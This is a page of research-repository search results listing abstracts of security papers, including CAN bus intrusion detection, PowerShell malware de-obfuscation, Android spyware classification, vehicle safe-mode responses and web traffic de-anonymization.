1,721,073 research outputs found
Detecting attacks to internal vehicle networks through Hamming distance
No full textAnalysis of in-vehicle networks is an open research area that gained relevance after recent reports of cyber attacks against connected vehicles. After those attacks gained international media attention, many security researchers started to propose different algorithms that are capable to model the normal behaviour of the CAN bus to detect the injection of malicious messages.
However, despite the automotive area has different constraint than classical IT security, many security research have been conducted by applying sophisticated algorithm used in IT anomaly detection, thus proposing solutions that are not applicable on current Electronic Control Units (ECUs).
This paper proposes a novel intrusion detection algorithm that aims to identify malicious CAN messages injected by attackers in the CAN bus of modern vehicles. Moreover, the proposed algorithm has been designed and implemented with the very strict constraint of low-end ECUs, having low computational complexity and small memory footprints.
The proposed algorithm identifies anomalies in the sequence of the payloads of different classes of IDs by computing the Hamming distance between consecutive payloads. Its detection performance are evaluated through experiments carried out using real CAN traffic gathered from an unmodified licensed vehicle
Security in IoT pairing & authentication protocols, a threat model and a case study analysis
No full textPowerDecode: a PowerShell Script Decoder Dedicated to Malware Analysis
Full text linkIn recent years, PowerShell-based attacks have been widely employed to compromise
systems’ security. Attackers can easily hide such malicious scripts in file formats (e.g.,
Office document macros) that can be easily delivered via large-scale spam mail
campaigns. Moreover, attackers employ obfuscation techniques that make the
PowerShell code able to evade the most common anti-malware protections and
perform unauthorized actions that will target the confidentiality, integrity and
availability of an information system. In this paper, we present PowerDecode, an
open-source module for the de-obfuscation and the analysis of PowerShell scripts. In
particular, this module receives a script as an input and returns its obfuscated layers,
its original de-obfuscated variant and a report about possible malicious activities. We
tested PowerDecode on almost 3000 malicious scripts and the attained results showed
significantly improved de-obfuscation performances in comparison to state-of-the-art
systems. More specifically, PowerDecode was able to resolve multiple types of
obfuscation and collect important information about attacks, such as malicious URLs
and IP addresses contacted by malware. Finally, PowerDecode can be easily integrated
in other malware analysis systems, and can represent a precious aid to identify
malicious activities
Evaluating Tangle Distributed Ledger for Access Control Policy Distribution in Multi-region Cloud Environments
No full textPlacing FaaS in the Fog, securely
No full textPlacing FaaS applications onto Fog infrastructures is an open problem presenting various challenges. It requires considering hardware and software requirements of single functions as well as Quality of Service requirements of the overall application. In this article, we propose a declarative methodology to address the placement of FaaS applications onto Fog infrastructures, supported by a running prototype. Our methodology considers hardware and software requirements, and latency constraints on function-function and function-service interactions. Particular attention is given to information flow security constraints and trust relations among the involved stakeholders, to rank eligible output placements. A lifelike motivating example from augmented reality is used to showcase the prototype
Scalable architecture for online prioritization of cyber threats
No full textThis paper proposes an innovative framework for the early detection of several
cyber attacks, where the main component is an analytics core that gathers streams of raw data
generated by network probes, builds several layer models representing different activities of
internal hosts, analyzes intra-layer and inter-layer information. The online analysis of internal
network activities at different levels distinguishes our approach with respect to most detection
tools and algorithms focusing on separate network levels or interactions between internal and
external hosts. Moreover, the integrated multi-layer analysis carried out through parallel
processing reduces false positives and guarantees scalability with respect to the size of the
network and the number of layers. As a further contribution, the proposed framework executes
autonomous triage by assigning a risk score to each internal host. This key feature allows
security experts to focus their attention on the few hosts with higher scores rather than wasting
time on thousands of daily alerts and false alarms
Vehicle Safe-Mode, Limp-Mode in the Service of Cyber Security
No full textThis paper describes a concept for vehicle safe-mode, that may help reduce the potential damage of an identified cyber-attack. Unlike other defense mechanisms, that try to block the attack or simply notify of its existence, our mechanism responds to the detected breach, by limiting the vehicle’s functionality to relatively safe operations, and optionally activating additional security counter-measures. This is done by adopting the already existing mechanism of Limp-mode, that was originally designed to limit the potential damage of either a mechanical or an electrical malfunction and let the vehicle “limp back home” in relative safety. We further introduce two modes of safe-modemoperation: In Transparent-mode, when a cyber-attack is detected
the vehicle enters its pre-configured Limp-mode; In Extended-mode we suggest to use custom messages that offer additional flexibility to both the reaction and the recovery plans. While Extended-mode requires modifications to the participating ECUs, Transparent-mode may be applicable to existing vehicles since it does not require any changes in the vehicle’s systems—in other words, it may even be deployed as an external component
connected through the OBD-II port. We suggest an architectural design for the given modes, and include guidelines for a safe-mode manager, its clients, possible reactions, and recovery plans. We note that our system can rely upon any deployed anomaly-detection system to identify the potential attack
A Data-driven Characterization of Modern Android Spyware
No full textAccording to Nokia’s 2017 Threat Intelligence Report, 68.5% of malware targets the Android platform; Windows is second with 28%, followed by iOS and other platforms with 3.5%. The Android spyware family UAPUSH was responsible for the most infections, and several of the top 20 most common Android malware were spyware. Simply put, modern spyware steals the basic information needed to fuel more deadly attacks such as ransomware and banking fraud. Not surprisingly, some forms of spyware are also classified as banking trojans (e.g., ACECARD). We present a data-driven characterization of the principal factors that distinguish modern Android spyware (July 2016–July 2017) both from goodware and other Android malware, using both traditional and deep ML. First, we propose an Ensemble Late Fusion (ELF) architecture that combines the results of multiple classifiers’ predicted probabilities to generate a final prediction. We show that ELF outperforms several of the best-known traditional and deep learning classifiers. Second, we automatically identify key features that distinguish spyware both from goodware and from other malware. Finally we present a detailed analysis of the factors distinguishing five important families of Android spyware: UAPUSH, PINCER, HEHE, USBCLEAVER, and ACECARD (the last is a hybrid spyware-banking trojan)
A time-series classification approach to shallow web traffic de-anonymization
Full text linkWeb traffic analysis and classification has been extensively studied, both with classical and deep learning techniques. Many of these systems analyse the entire packet to perform the classification task. Due to the increase of encrypted traffic in recent years, this approach has become problematic. Moreover, few works focus on the classification of the users themselves, also called web traffic de-anonymization. In the present paper we address this problem by proposing an approach focused on a shallow, temporal analysis of web traffic data packets. We show that it is possible to identify the users of a network just by analyzing their navigation patterns and without accessing the content of the TCP packets. Finally, we propose a comparison between the performance of our approach and a more classical feed forward neural network architecture to showcase the informational power of temporal data in this context
- …
